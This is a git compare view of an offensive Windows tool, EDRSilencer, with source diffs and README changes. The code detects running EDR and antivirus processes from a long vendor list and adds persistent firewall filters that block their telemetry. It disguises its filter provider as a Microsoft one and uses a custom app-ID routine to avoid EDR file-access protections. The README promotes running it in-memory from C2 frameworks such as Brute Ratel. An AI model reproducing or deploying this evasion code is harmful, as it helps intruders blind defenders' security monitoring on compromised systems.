Mirrors/netero1010-edrsilencer
1
0
Fork 0
mirror of https://github.com/netero1010/EDRSilencer.git synced 2026-06-09 09:27:15 +00:00
Code Issues Packages Projects Releases Wiki Activity

Compare commits

base: Mirrors/netero1010-edrsilencer:1.0
Branches Tags
Mirrors/netero1010-edrsilencer:main
Mirrors/netero1010-edrsilencer:1.4 Mirrors/netero1010-edrsilencer:1.3 Mirrors/netero1010-edrsilencer:1.2 Mirrors/netero1010-edrsilencer:1.1 Mirrors/netero1010-edrsilencer:1.0
...
compare: Mirrors/netero1010-edrsilencer:1.3
Branches Tags
Mirrors/netero1010-edrsilencer:main
Mirrors/netero1010-edrsilencer:1.4 Mirrors/netero1010-edrsilencer:1.3 Mirrors/netero1010-edrsilencer:1.2 Mirrors/netero1010-edrsilencer:1.1 Mirrors/netero1010-edrsilencer:1.0

10 Commits
1.0 ... 1.3

Author SHA1 Message Date
netero1010 57f6bb6b24 Version 1.3 2024-01-07 21:18:23 +08:00
netero1010 fb8f4b43a9 Version 1.2 2024-01-05 01:34:33 +08:00
netero1010 2c3a1c5e09 Update to include Cisco Secure Endpoint (credit @logdumpster). Also, removed CrowdStrike from the supporting list as blocking its service process is insufficient. Require further testing 2024-01-02 18:03:47 +08:00
netero1010 7988dae6bf Update to include Cisco Secure Endpoint (credit @logdumpster). Also, removed CrowdStrike from the supporting list as blocking its service process is insufficient. Require further testing 2024-01-02 18:02:49 +08:00
netero1010 6287d391ed Remove EDRSilencer.exe 2023-12-30 19:39:25 +08:00
netero1010 59e76a8aaa Update README.md 2023-12-30 19:38:31 +08:00
netero1010 e238862577 Update README.md 2023-12-30 19:36:57 +08:00
netero1010 d544a9fbb1 Added more EDR solutions (e.g., CrowdStrike, Carbon Black) to the list 2023-12-30 19:07:02 +08:00
Chris Au 2f16f16813 Merge pull request #2 from logdumpster/main 
Added Qualys EDR process
 2023-12-30 19:00:51 +08:00
logdumpster 7bffc66426 Added Qualys EDR process 
Added Qualys EDR process
 2023-12-29 01:05:03 -06:00
4 changed files with 439 additions and 100 deletions
Expand all files Collapse all files
EDRSilencer.c
+228 -82
View File
@@ -4,50 +4,89 @@ char* edrProcess[] = {
// Microsoft Defender for Endpoint and Microsoft Defender Antivirus // Microsoft Defender for Endpoint and Microsoft Defender Antivirus
"MsMpEng.exe", "MsMpEng.exe",
"MsSense.exe", "MsSense.exe",
"SenseIR.exe",
"SenseNdr.exe",
"SenseCncProxy.exe",
"SenseSampleUploader.exe",
// Elastic EDR // Elastic EDR
"winlogbeat.exe",
"elastic-agent.exe", "elastic-agent.exe",
"elastic-endpoint.exe", "elastic-endpoint.exe",
"filebeat.exe", "filebeat.exe",
// Trellix EDR // Trellix EDR
"xagt.exe" "xagt.exe",
// Qualys EDR
"QualysAgent.exe",
// SentinelOne
"SentinelAgent.exe",
"SentinelAgentWorker.exe",
"SentinelServiceHost.exe",
"SentinelStaticEngine.exe",
"LogProcessorService.exe",
"SentinelStaticEngineScanner.exe",
"SentinelHelperService.exe",
"SentinelBrowserNativeHost.exe",
// Cylance
"CylanceSvc.exe",
// Cybereason
"AmSvc.exe",
"CrAmTray.exe",
"CrsSvc.exe",
"ExecutionPreventionSvc.exe",
"CybereasonAV.exe",
// Carbon Black EDR
"cb.exe",
// Carbon Black Cloud
"RepMgr.exe",
"RepUtils.exe",
"RepUx.exe",
"RepWAV.exe",
"RepWSC.exe",
// Tanium
"TaniumClient.exe",
"TaniumCX.exe",
"TaniumDetectEngine.exe",
// Palo Alto Networks Traps/Cortex XDR
"Traps.exe",
"cyserver.exe",
"CyveraService.exe",
"CyvrFsFlt.exe",
// FortiEDR
"fortiedr.exe",
// Cisco Secure Endpoint (Formerly Cisco AMP)
"sfc.exe",
// ESET Inspect
"EIConnector.exe",
"ekrn.exe",
// Harfanglab EDR
"hurukai.exe",
//TrendMicro Apex One
"CETASvc.exe",
"WSCommunicator.exe",
"EndpointBasecamp.exe",
"TmListen.exe",
"Ntrtscan.exe",
"TmWSCSvc.exe",
"PccNTMon.exe",
"TMBMSRV.exe",
"CNTAoSMgr.exe",
"TmCCSF.exe"
}; };
BOOL inWfpFlag[sizeof(edrProcess) / sizeof(edrProcess[0])] = { FALSE };
// The "unblockall" feature will delete all filters that are based on the custom filter name // The "unblockall" feature will delete all filters that are based on the custom filter name
WCHAR* filterName = L"Custom Outbound Filter"; WCHAR* filterName = L"Custom Outbound Filter";
WCHAR* providerName = L"Microsoft Corporation";
// provider description has to be unique because:
// - avoid problem in adding persistent WFP filter to a provider (error 0x80320016)
// - avoid removing legitimate WFP provider
WCHAR* providerDescription = L"Microsoft Windows WFP Built-in custom provider.";
// d78e1e87-8644-4ea5-9437-d809ecefc971 BOOL inWfpFlag[sizeof(edrProcess) / sizeof(edrProcess[0])] = { FALSE };
DEFINE_GUID(
FWPM_CONDITION_ALE_APP_ID,
0xd78e1e87,
0x8644,
0x4ea5,
0x94, 0x37, 0xd8, 0x09, 0xec, 0xef, 0xc9, 0x71
);
// c38d57d1-05a7-4c33-904f-7fbceee60e82
DEFINE_GUID(
FWPM_LAYER_ALE_AUTH_CONNECT_V4,
0xc38d57d1,
0x05a7,
0x4c33,
0x90, 0x4f, 0x7f, 0xbc, 0xee, 0xe6, 0x0e, 0x82
);
// 4a72393b-319f-44bc-84c3-ba54dcb3b6b4
DEFINE_GUID(
FWPM_LAYER_ALE_AUTH_CONNECT_V6,
0x4a72393b,
0x319f,
0x44bc,
0x84, 0xc3, 0xba, 0x54, 0xdc, 0xb3, 0xb6, 0xb4
);
// Check if the running process is our list // Check if the running process is our list
BOOL isInEdrProcessList(const char* procName) { BOOL isInEdrProcessList(const char* procName) {
for (int i = 0; i < sizeof(edrProcess) / sizeof(edrProcess[0]); i++) { for (int i = 0; i < sizeof(edrProcess) / sizeof(edrProcess[0]); i++) {
if (strstr(procName, edrProcess[i]) != NULL && !inWfpFlag[i]) { if (strcmp(procName, edrProcess[i]) == 0 && !inWfpFlag[i]) {
inWfpFlag[i] = TRUE; inWfpFlag[i] = TRUE;
return TRUE; return TRUE;
} }
@@ -57,25 +96,30 @@ BOOL isInEdrProcessList(const char* procName) {
// Add WFP filters for all known EDR process(s) // Add WFP filters for all known EDR process(s)
void BlockEdrProcessTraffic() { void BlockEdrProcessTraffic() {
HANDLE hEngine; DWORD result = 0;
FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine); HANDLE hEngine = NULL;
HANDLE hProcessSnap; HANDLE hProcessSnap = NULL;
HANDLE hModuleSnap; HANDLE hModuleSnap = NULL;
PROCESSENTRY32 pe32; PROCESSENTRY32 pe32 = {0};
MODULEENTRY32 me32;
BOOL isEdrDetected = FALSE; BOOL isEdrDetected = FALSE;
result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine);
if (result != ERROR_SUCCESS) {
printf("[-] FwpmEngineOpen0 failed with error code: 0x%x.\n", result);
return;
}
EnableSeDebugPrivilege(); EnableSeDebugPrivilege();
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == INVALID_HANDLE_VALUE) { if (hProcessSnap == INVALID_HANDLE_VALUE) {
printf("[-] CreateToolhelp32Snapshot (of processes) failed with error code: 0x%x\n", GetLastError()); printf("[-] CreateToolhelp32Snapshot (of processes) failed with error code: 0x%x.\n", GetLastError());
return; return;
} }
pe32.dwSize = sizeof(PROCESSENTRY32); pe32.dwSize = sizeof(PROCESSENTRY32);
if (!Process32First(hProcessSnap, &pe32)) { if (!Process32First(hProcessSnap, &pe32)) {
printf("[-] Process32First failed with error code: 0x%x\n", GetLastError()); printf("[-] Process32First failed with error code: 0x%x.\n", GetLastError());
CloseHandle(hProcessSnap); CloseHandle(hProcessSnap);
return; return;
} }
@@ -87,20 +131,43 @@ void BlockEdrProcessTraffic() {
// Get full path of the running process // Get full path of the running process
HANDLE hProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pe32.th32ProcessID); HANDLE hProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pe32.th32ProcessID);
if (hProcess) { if (hProcess) {
WCHAR fullPath[MAX_PATH]; WCHAR fullPath[MAX_PATH] = {0};
DWORD size = MAX_PATH; DWORD size = MAX_PATH;
QueryFullProcessImageNameW(hProcess, 0, fullPath, &size); FWPM_FILTER_CONDITION0 cond = {0};
FWPM_FILTER_CONDITION0 cond;
FWPM_FILTER0 filter = {0}; FWPM_FILTER0 filter = {0};
FWP_BYTE_BLOB* appId; FWPM_PROVIDER0 provider = {0};
GUID providerGuid = {0};
FWP_BYTE_BLOB* appId = NULL;
UINT64 filterId = 0;
ErrorCode errorCode = CUSTOM_SUCCESS;
if (FwpmGetAppIdFromFileName0(fullPath, &appId) != ERROR_SUCCESS) { QueryFullProcessImageNameW(hProcess, 0, fullPath, &size);
printf(" [-] FwpmGetAppIdFromFileName0 failed to get app ID.\n"); errorCode = CustomFwpmGetAppIdFromFileName0(fullPath, &appId);
if (errorCode != CUSTOM_SUCCESS) {
switch (errorCode) {
case CUSTOM_FILE_NOT_FOUND:
printf(" [-] CustomFwpmGetAppIdFromFileName0 failed to convert the \"%S\" to app ID format. The file path cannot be found.\n", fullPath);
break;
case CUSTOM_MEMORY_ALLOCATION_ERROR:
printf(" [-] CustomFwpmGetAppIdFromFileName0 failed to convert the \"%S\" to app ID format. Error occurred in allocating memory for appId.\n", fullPath);
break;
case CUSTOM_NULL_INPUT:
printf(" [-] CustomFwpmGetAppIdFromFileName0 failed to convert the \"%S\" to app ID format. Please check your input.\n", fullPath);
break;
case CUSTOM_DRIVE_NAME_NOT_FOUND:
printf(" [-] CustomFwpmGetAppIdFromFileName0 failed to convert the \"%S\" to app ID format. The drive name cannot be found.\n", fullPath);
break;
case CUSTOM_FAILED_TO_GET_DOS_DEVICE_NAME:
printf(" [-] CustomFwpmGetAppIdFromFileName0 failed to convert the \"%S\" to app ID format. Failed to convert drive name to DOS device name.\n", fullPath);
break;
default:
break;
}
CloseHandle(hProcess); CloseHandle(hProcess);
continue; continue;
} }
// Setting up WFP filter and condition // Sett up WFP filter and condition
filter.displayData.name = filterName; filter.displayData.name = filterName;
filter.flags = FWPM_FILTER_FLAG_PERSISTENT; filter.flags = FWPM_FILTER_FLAG_PERSISTENT;
filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V4; filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V4;
@@ -112,15 +179,29 @@ void BlockEdrProcessTraffic() {
filter.filterCondition = &cond; filter.filterCondition = &cond;
filter.numFilterConditions = 1; filter.numFilterConditions = 1;
UINT64 filterId; // Add WFP provider for the filter
DWORD result; if (GetProviderGUIDByDescription(providerDescription, &providerGuid)) {
filter.providerKey = &providerGuid;
} else {
provider.displayData.name = providerName;
provider.displayData.description = providerDescription;
provider.flags = FWPM_PROVIDER_FLAG_PERSISTENT;
result = FwpmProviderAdd0(hEngine, &provider, NULL);
if (result != ERROR_SUCCESS) {
printf(" [-] FwpmProviderAdd0 failed with error code: 0x%x.\n", result);
} else {
if (GetProviderGUIDByDescription(providerDescription, &providerGuid)) {
filter.providerKey = &providerGuid;
}
}
}
// Add filter to both IPv4 and IPv6 layers // Add filter to both IPv4 and IPv6 layers
result = FwpmFilterAdd0(hEngine, &filter, NULL, &filterId); result = FwpmFilterAdd0(hEngine, &filter, NULL, &filterId);
if (result == ERROR_SUCCESS) { if (result == ERROR_SUCCESS) {
printf(" Added WFP filter for \"%S\" (Filter id: %d, IPv4 layer).\n", fullPath, filterId); printf(" Added WFP filter for \"%S\" (Filter id: %d, IPv4 layer).\n", fullPath, filterId);
} else { } else {
printf(" [-] Failed to add filter in IPv4 layer with error code: 0x%x\n", result); printf(" [-] Failed to add filter in IPv4 layer with error code: 0x%x.\n", result);
} }
filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V6; filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V6;
@@ -128,13 +209,13 @@ void BlockEdrProcessTraffic() {
if (result == ERROR_SUCCESS) { if (result == ERROR_SUCCESS) {
printf(" Added WFP filter for \"%S\" (Filter id: %d, IPv6 layer).\n", fullPath, filterId); printf(" Added WFP filter for \"%S\" (Filter id: %d, IPv6 layer).\n", fullPath, filterId);
} else { } else {
printf(" [-] Failed to add filter in IPv6 layer with error code: 0x%x\n", result); printf(" [-] Failed to add filter in IPv6 layer with error code: 0x%x.\n", result);
} }
FwpmFreeMemory0((void**)&appId); FreeAppId(appId);
CloseHandle(hProcess); CloseHandle(hProcess);
} else { } else {
printf(" [-] Could not open process \"%s\" with error code: 0x%x\n", pe32.szExeFile, GetLastError()); printf(" [-] Could not open process \"%s\" with error code: 0x%x.\n", pe32.szExeFile, GetLastError());
} }
} }
} while (Process32Next(hProcessSnap, &pe32)); } while (Process32Next(hProcessSnap, &pe32));
@@ -149,19 +230,45 @@ void BlockEdrProcessTraffic() {
// Add block WFP filter to user-defined process // Add block WFP filter to user-defined process
void BlockProcessTraffic(char* fullPath) { void BlockProcessTraffic(char* fullPath) {
HANDLE hEngine; DWORD result = 0;
FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine); HANDLE hEngine = NULL;
WCHAR wFullPath[MAX_PATH] = {0};
WCHAR wFullPath[MAX_PATH];
DWORD size = MAX_PATH; DWORD size = MAX_PATH;
CharArrayToWCharArray(fullPath, wFullPath, sizeof(wFullPath) / sizeof(wFullPath[0])); FWPM_FILTER_CONDITION0 cond = {0};
FWPM_FILTER_CONDITION0 cond;
FWPM_FILTER0 filter = {0}; FWPM_FILTER0 filter = {0};
FWPM_PROVIDER0 provider = {0};
GUID providerGuid = {0};
FWP_BYTE_BLOB* appId = NULL;
UINT64 filterId = 0;
ErrorCode errorCode = CUSTOM_SUCCESS;
FWP_BYTE_BLOB* appId; result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine);
if (result != ERROR_SUCCESS) {
if (FwpmGetAppIdFromFileName0(wFullPath, &appId) != ERROR_SUCCESS) { printf("[-] FwpmEngineOpen0 failed with error code: 0x%x.\n", result);
printf("[-] FwpmGetAppIdFromFileName0 failed to get app ID. Please check if the process path is valid.\n"); return;
}
CharArrayToWCharArray(fullPath, wFullPath, sizeof(wFullPath) / sizeof(wFullPath[0]));
errorCode = CustomFwpmGetAppIdFromFileName0(wFullPath, &appId);
if (errorCode != CUSTOM_SUCCESS) {
switch (errorCode) {
case CUSTOM_FILE_NOT_FOUND:
printf("[-] CustomFwpmGetAppIdFromFileName0 failed to convert the \"%S\" to app ID format. The file path cannot be found.\n", wFullPath);
break;
case CUSTOM_MEMORY_ALLOCATION_ERROR:
printf("[-] CustomFwpmGetAppIdFromFileName0 failed to convert the \"%S\" to app ID format. Error occurred in allocating memory for appId.\n", wFullPath);
break;
case CUSTOM_NULL_INPUT:
printf("[-] CustomFwpmGetAppIdFromFileName0 failed to convert the \"%S\" to app ID format. Please check your input.\n", wFullPath);
break;
case CUSTOM_DRIVE_NAME_NOT_FOUND:
printf("[-] CustomFwpmGetAppIdFromFileName0 failed to convert the \"%S\" to app ID format. The drive name cannot be found.\n", wFullPath);
break;
case CUSTOM_FAILED_TO_GET_DOS_DEVICE_NAME:
printf("[-] CustomFwpmGetAppIdFromFileName0 failed to convert the \"%S\" to app ID format. Failed to convert drive name to DOS device name.\n", wFullPath);
break;
default:
break;
}
return; return;
} }
@@ -177,15 +284,29 @@ void BlockProcessTraffic(char* fullPath) {
filter.filterCondition = &cond; filter.filterCondition = &cond;
filter.numFilterConditions = 1; filter.numFilterConditions = 1;
UINT64 filterId; // Add WFP provider for the filter
DWORD result; if (GetProviderGUIDByDescription(providerDescription, &providerGuid)) {
filter.providerKey = &providerGuid;
} else {
provider.displayData.name = providerName;
provider.displayData.description = providerDescription;
provider.flags = FWPM_PROVIDER_FLAG_PERSISTENT;
result = FwpmProviderAdd0(hEngine, &provider, NULL);
if (result != ERROR_SUCCESS) {
printf("[-] FwpmProviderAdd0 failed with error code: 0x%x.\n", result);
} else {
if (GetProviderGUIDByDescription(providerDescription, &providerGuid)) {
filter.providerKey = &providerGuid;
}
}
}
// Add filter to both IPv4 and IPv6 layers // Add filter to both IPv4 and IPv6 layers
result = FwpmFilterAdd0(hEngine, &filter, NULL, &filterId); result = FwpmFilterAdd0(hEngine, &filter, NULL, &filterId);
if (result == ERROR_SUCCESS) { if (result == ERROR_SUCCESS) {
printf("Added WFP filter for \"%s\" (Filter id: %d, IPv4 layer).\n", fullPath, filterId); printf("Added WFP filter for \"%s\" (Filter id: %d, IPv4 layer).\n", fullPath, filterId);
} else { } else {
printf("[-] Failed to add filter in IPv4 layer with error code: 0x%x\n", result); printf("[-] Failed to add filter in IPv4 layer with error code: 0x%x.\n", result);
} }
filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V6; filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V6;
@@ -193,31 +314,32 @@ void BlockProcessTraffic(char* fullPath) {
if (result == ERROR_SUCCESS) { if (result == ERROR_SUCCESS) {
printf("Added WFP filter for \"%s\" (Filter id: %d, IPv6 layer).\n", fullPath, filterId); printf("Added WFP filter for \"%s\" (Filter id: %d, IPv6 layer).\n", fullPath, filterId);
} else { } else {
printf("[-] Failed to add filter in IPv6 layer with error code: 0x%x\n", result); printf("[-] Failed to add filter in IPv6 layer with error code: 0x%x.\n", result);
} }
FwpmFreeMemory0((void**)&appId); FreeAppId(appId);
FwpmEngineClose0(hEngine); FwpmEngineClose0(hEngine);
return; return;
} }
// Remove all WFP filters previously created // Remove all WFP filters previously created
void UnblockAllWfpFilters() { void UnblockAllWfpFilters() {
HANDLE hEngine; HANDLE hEngine = NULL;
DWORD result; DWORD result = 0;
HANDLE enumHandle; HANDLE enumHandle = NULL;
FWPM_FILTER0** filters; FWPM_FILTER0** filters = NULL;
GUID providerGuid = {0};
UINT32 numFilters = 0; UINT32 numFilters = 0;
BOOL foundFilter = FALSE; BOOL foundFilter = FALSE;
result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine); result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine);
if (result != ERROR_SUCCESS) { if (result != ERROR_SUCCESS) {
printf("[-] FwpmEngineOpen0 failed with error code: 0x%x\n", result); printf("[-] FwpmEngineOpen0 failed with error code: 0x%x.\n", result);
return; return;
} }
result = FwpmFilterCreateEnumHandle0(hEngine, NULL, &enumHandle); result = FwpmFilterCreateEnumHandle0(hEngine, NULL, &enumHandle);
if (result != ERROR_SUCCESS) { if (result != ERROR_SUCCESS) {
printf("[-] FwpmFilterCreateEnumHandle0 failed with error code: 0x%x\n", result); printf("[-] FwpmFilterCreateEnumHandle0 failed with error code: 0x%x.\n", result);
return; return;
} }
@@ -225,7 +347,7 @@ void UnblockAllWfpFilters() {
result = FwpmFilterEnum0(hEngine, enumHandle, 1, &filters, &numFilters); result = FwpmFilterEnum0(hEngine, enumHandle, 1, &filters, &numFilters);
if (result != ERROR_SUCCESS) { if (result != ERROR_SUCCESS) {
printf("[-] FwpmFilterEnum0 failed with error code: 0x%x\n", result); printf("[-] FwpmFilterEnum0 failed with error code: 0x%x.\n", result);
FwpmFilterDestroyEnumHandle0(hEngine, enumHandle); FwpmFilterDestroyEnumHandle0(hEngine, enumHandle);
FwpmEngineClose0(hEngine); FwpmEngineClose0(hEngine);
return; return;
@@ -249,6 +371,17 @@ void UnblockAllWfpFilters() {
} }
} }
if (GetProviderGUIDByDescription(providerDescription, &providerGuid)) {
result = FwpmProviderDeleteByKey0(hEngine, &providerGuid);
if (result != ERROR_SUCCESS) {
if (result != FWP_E_IN_USE) {
printf("[-] FwpmProviderDeleteByKey0 failed with error code: 0x%x.\n", result);
}
} else {
printf("Deleted custom WFP provider.\n");
}
}
if (!foundFilter) { if (!foundFilter) {
printf("[-] Unable to find any WFP filter created by this tool.\n"); printf("[-] Unable to find any WFP filter created by this tool.\n");
} }
@@ -258,12 +391,13 @@ void UnblockAllWfpFilters() {
// Remove WFP filter based on filter id // Remove WFP filter based on filter id
void UnblockWfpFilter(UINT64 filterId) { void UnblockWfpFilter(UINT64 filterId) {
HANDLE hEngine; HANDLE hEngine = NULL;
DWORD result; DWORD result = 0;
GUID providerGuid = {0};
result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine); result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine);
if (result != ERROR_SUCCESS) { if (result != ERROR_SUCCESS) {
printf("[-] FwpmEngineOpen0 failed with error code: 0x%x\n", result); printf("[-] FwpmEngineOpen0 failed with error code: 0x%x.\n", result);
return; return;
} }
@@ -278,19 +412,31 @@ void UnblockWfpFilter(UINT64 filterId) {
printf("[-] Failed to delete filter id: %llu with error code: 0x%x.\n", filterId, result); printf("[-] Failed to delete filter id: %llu with error code: 0x%x.\n", filterId, result);
} }
if (GetProviderGUIDByDescription(providerDescription, &providerGuid)) {
result = FwpmProviderDeleteByKey0(hEngine, &providerGuid);
if (result != ERROR_SUCCESS) {
if (result != FWP_E_IN_USE) {
printf("[-] FwpmProviderDeleteByKey0 failed with error code: 0x%x.\n", result);
}
} else {
printf("Deleted custom WFP provider.\n");
}
}
FwpmEngineClose0(hEngine); FwpmEngineClose0(hEngine);
} }
void PrintHelp() { void PrintHelp() {
printf("Usage: EDROutBlock.exe <blockedr/block/unblockall/unblock>\n"); printf("Usage: EDRSilencer.exe <blockedr/block/unblockall/unblock>\n");
printf("Version: 1.3\n");
printf("- Add WFP filters to block the IPv4 and IPv6 outbound traffic of all detected EDR processes:\n"); printf("- Add WFP filters to block the IPv4 and IPv6 outbound traffic of all detected EDR processes:\n");
printf(" EDROutBlock.exe blockedr\n\n"); printf(" EDRSilencer.exe blockedr\n\n");
printf("- Add WFP filters to block the IPv4 and IPv6 outbound traffic of a specific process (full path is required):\n"); printf("- Add WFP filters to block the IPv4 and IPv6 outbound traffic of a specific process (full path is required):\n");
printf(" EDROutBlock.exe block \"C:\\Windows\\System32\\curl.exe\"\n\n"); printf(" EDRSilencer.exe block \"C:\\Windows\\System32\\curl.exe\"\n\n");
printf("- Remove all WFP filters applied by this tool:\n"); printf("- Remove all WFP filters applied by this tool:\n");
printf(" EDROutBlock.exe unblockall\n\n"); printf(" EDRSilencer.exe unblockall\n\n");
printf("- Remove a specific WFP filter based on filter id:\n"); printf("- Remove a specific WFP filter based on filter id:\n");
printf(" EDROutBlock.exe unblock <filter id>"); printf(" EDRSilencer.exe unblock <filter id>");
} }
int main(int argc, char *argv[]) { int main(int argc, char *argv[]) {
@@ -329,7 +475,7 @@ int main(int argc, char *argv[]) {
UINT64 filterId = strtoull(argv[2], &endptr, 10); UINT64 filterId = strtoull(argv[2], &endptr, 10);
if (errno != 0) { if (errno != 0) {
printf("[-] strtoull failed with error code: 0x%x\n", errno); printf("[-] strtoull failed with error code: 0x%x.\n", errno);
return 1; return 1;
} }
README.md
+21 -2
View File
@@ -7,8 +7,27 @@ This tool offers the following features:
- Remove all WFP filters created by this tool - Remove all WFP filters created by this tool
- Remove a specific WFP filter by filter id - Remove a specific WFP filter by filter id
- Support to run in C2 with in-memory PE execution module (e.g., `BruteRatel's memexec`) - Support to run in C2 with in-memory PE execution module (e.g., `BruteRatel's memexec`)
- Some EDR controls (e.g., minifilter) deny access when a process attempts to obtain a file handle of its EDR processes (e.g., through `CreateFileW`). However, the `FwpmGetAppIdFromFileName0` API, which is used to obtain the FWP app id of the targeted EDR process, calls `CreateFileW` internally. To avoid this, a custom `FwpmGetAppIdFromFileName0` was implemented to construct the app id without invoking `CreateFileW`, thus preventing unexpected failures when adding a WFP filter to an EDR process
**The current EDR process block list (edrProcess) includes only a limited number of EDR solutions (e.g., MDE, Elastic EDR). It would be appreciated if someone could assist in expanding the process list in `EDRSilencer.c` to encompass a broader range of other EDR solutions.** The tool currently supports the following EDRs:
- Microsoft Defender for Endpoint and Microsoft Defender Antivirus
- Elastic EDR
- Trellix EDR
- Qualys EDR
- SentinelOne
- Cylance
- Cybereason
- Carbon Black EDR
- Carbon Black Cloud
- Tanium
- Palo Alto Networks Traps/Cortex XDR
- FortiEDR
- Cisco Secure Endpoint (Formerly Cisco AMP)
- ESET Inspect
- Harfanglab EDR
- TrendMicro Apex One
**As I do not have access to all these EDRs for testing, please do not hesitate to correct me if the listed processes (edrProcess in `EDRSilencer.c`) prove insufficient in blocking all alert, detection, or event forward traffic.**
## Testing Environment ## Testing Environment
Tested in Windows 10 and Windows Server 2016 Tested in Windows 10 and Windows Server 2016
@@ -31,7 +50,7 @@ Usage: EDRSilencer.exe <blockedr/block/unblockall/unblock>
## Compile ## Compile
``` ```
x86_64-w64-mingw32-gcc EDRSilencer.c -o EDRSilencer.exe -lfwpuclnt utils.c x86_64-w64-mingw32-gcc EDRSilencer.c utils.c -o EDRSilencer.exe -lfwpuclnt
``` ```
## Example ## Example
utils.c
+144 -13
View File
@@ -1,20 +1,20 @@
#include "utils.h" #include "utils.h"
BOOL CheckProcessIntegrityLevel() { BOOL CheckProcessIntegrityLevel() {
HANDLE hToken; HANDLE hToken = NULL;
DWORD dwLength = 0; DWORD dwLength = 0;
PTOKEN_MANDATORY_LABEL pTIL = NULL; PTOKEN_MANDATORY_LABEL pTIL = NULL;
DWORD dwIntegrityLevel; DWORD dwIntegrityLevel = 0;
BOOL isHighIntegrity = FALSE; BOOL isHighIntegrity = FALSE;
if (!OpenThreadToken(GetCurrentThread(), TOKEN_QUERY, TRUE, &hToken)) { if (!OpenThreadToken(GetCurrentThread(), TOKEN_QUERY, TRUE, &hToken)) {
if (GetLastError() != ERROR_NO_TOKEN) { if (GetLastError() != ERROR_NO_TOKEN) {
printf("[-] OpenThreadToken failed with error code:0x%x\n", GetLastError()); printf("[-] OpenThreadToken failed with error code: 0x%x.\n", GetLastError());
return FALSE; return FALSE;
} }
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) { if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
printf("[-] OpenProcessToken failed with error code:0x%x\n", GetLastError()); printf("[-] OpenProcessToken failed with error code: 0x%x.\n", GetLastError());
return FALSE; return FALSE;
} }
} }
@@ -22,20 +22,20 @@ BOOL CheckProcessIntegrityLevel() {
// Get the size of the integrity level information // Get the size of the integrity level information
if (!GetTokenInformation(hToken, TokenIntegrityLevel, NULL, 0, &dwLength) && if (!GetTokenInformation(hToken, TokenIntegrityLevel, NULL, 0, &dwLength) &&
GetLastError() != ERROR_INSUFFICIENT_BUFFER) { GetLastError() != ERROR_INSUFFICIENT_BUFFER) {
printf("[-] GetTokenInformation failed with error code:0x%x\n", GetLastError()); printf("[-] GetTokenInformation failed with error code: 0x%x.\n", GetLastError());
CloseHandle(hToken); CloseHandle(hToken);
return FALSE; return FALSE;
} }
pTIL = (PTOKEN_MANDATORY_LABEL)LocalAlloc(LPTR, dwLength); pTIL = (PTOKEN_MANDATORY_LABEL)LocalAlloc(LPTR, dwLength);
if (pTIL == NULL) { if (pTIL == NULL) {
printf("[-] LocalAlloc failed with error code:0x%x\n", GetLastError()); printf("[-] LocalAlloc failed with error code: 0x%x.\n", GetLastError());
CloseHandle(hToken); CloseHandle(hToken);
return FALSE; return FALSE;
} }
if (!GetTokenInformation(hToken, TokenIntegrityLevel, pTIL, dwLength, &dwLength)) { if (!GetTokenInformation(hToken, TokenIntegrityLevel, pTIL, dwLength, &dwLength)) {
printf("[-] GetTokenInformation failed with error code:0x%x\n", GetLastError()); printf("[-] GetTokenInformation failed with error code: 0x%x.\n", GetLastError());
LocalFree(pTIL); LocalFree(pTIL);
CloseHandle(hToken); CloseHandle(hToken);
return FALSE; return FALSE;
@@ -57,22 +57,22 @@ BOOL CheckProcessIntegrityLevel() {
// Enable SeDebugPrivilege to obtain full path of running processes // Enable SeDebugPrivilege to obtain full path of running processes
BOOL EnableSeDebugPrivilege() { BOOL EnableSeDebugPrivilege() {
HANDLE hToken = NULL; HANDLE hToken = NULL;
TOKEN_PRIVILEGES tokenPrivileges = { 0 }; TOKEN_PRIVILEGES tokenPrivileges = {0};
if (!OpenThreadToken(GetCurrentThread(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, TRUE, &hToken)) { if (!OpenThreadToken(GetCurrentThread(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, TRUE, &hToken)) {
if (GetLastError() != ERROR_NO_TOKEN) { if (GetLastError() != ERROR_NO_TOKEN) {
printf("[-] OpenThreadToken failed with error code:0x%x\n", GetLastError()); printf("[-] OpenThreadToken failed with error code: 0x%x.\n", GetLastError());
return FALSE; return FALSE;
} }
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken)) { if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken)) {
printf("[-] OpenProcessToken failed with error code:0x%x\n", GetLastError()); printf("[-] OpenProcessToken failed with error code: 0x%x.\n", GetLastError());
return FALSE; return FALSE;
} }
} }
if (!LookupPrivilegeValueA(NULL, "SeDebugPrivilege", &tokenPrivileges.Privileges[0].Luid)){ if (!LookupPrivilegeValueA(NULL, "SeDebugPrivilege", &tokenPrivileges.Privileges[0].Luid)){
